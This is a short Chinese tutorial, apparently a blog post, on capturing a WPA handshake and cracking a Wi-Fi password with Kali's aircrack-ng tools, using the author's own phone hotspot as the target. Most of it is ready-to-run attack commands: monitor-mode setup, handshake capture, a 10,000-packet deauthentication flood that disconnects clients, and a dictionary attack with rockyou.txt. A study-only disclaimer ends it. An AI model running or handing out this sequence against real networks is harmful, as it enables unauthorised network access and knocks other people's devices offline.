一、工具准备
1.Kali虚拟机
2.一个外接免驱USB无线网卡,要能够监听的(网上能买,十几块钱)
3.airmon-ng工具(一般kali自带)
二、准备工作
1.将无线网卡插入电脑,连接至虚拟机
2.启动kali,查看IP发现出现wlan0,这个就是我们的无线网卡
3.使用airmon-ng,启动wlan0,设置为监听模式。
airmon-ng start wlan0
启动后wlan0网卡会变成wlan0mon,这就是监听模式了
4.开启监听
airodump-ng wlan0mon
如果监听不到,可能是某些进程影响到网卡工作,可以使用以下命令
airmon-ng check kill
然后再次开启监听
5.我这里是使用自己的手机热点作为wifi,这里已经监听到了
6.抓包,我以自己的手机热点lueluelue为例
airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon,该命令只是监听,不会影响用户使用
BSSID就是图中对应的wifi的,信道为CH,这里是1,-w写入到一个路径中,我们在home/kali/下新建一个test,把抓到的包命名为test1
airodump-ng --bssid 9A:10:3C:26:CC:DA -c 1 -w /home/kali/test/test1 wlan0mon
这里出现了STATION,这是连接到我们热点的设备(手机、电脑等),我这里有两个,一个就是我的本机,还有一个就是我的测试机
7.接下来我们新开一个终端,可以对连接到该无线网络的设备进行中断攻击。
aireplay-ng -0 10000 -c E0:0A:F6:52:28:7D -a 9A:10:3C:26:CC:DA wlan0mon
这里我们进行一万次的发包
设备无线网络断开
当我们停止发包,设备重新连接上无线网络
8.密码爆破
基本上只能利用密码字典来进行爆破,这里我使用的是kali自带的密码字典,但是因为我的热点密码是比较强的,所以我把密码添加到了字典了,以便测试
之前我们抓到的包是在/home/kali/test里,这里我们要用到test1-01.cap这个文件
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kali/test/test1-01.cap
如果字典里有的话,基本上秒解
大概就这么多了........我说完了...........
仅供学习,遵纪守法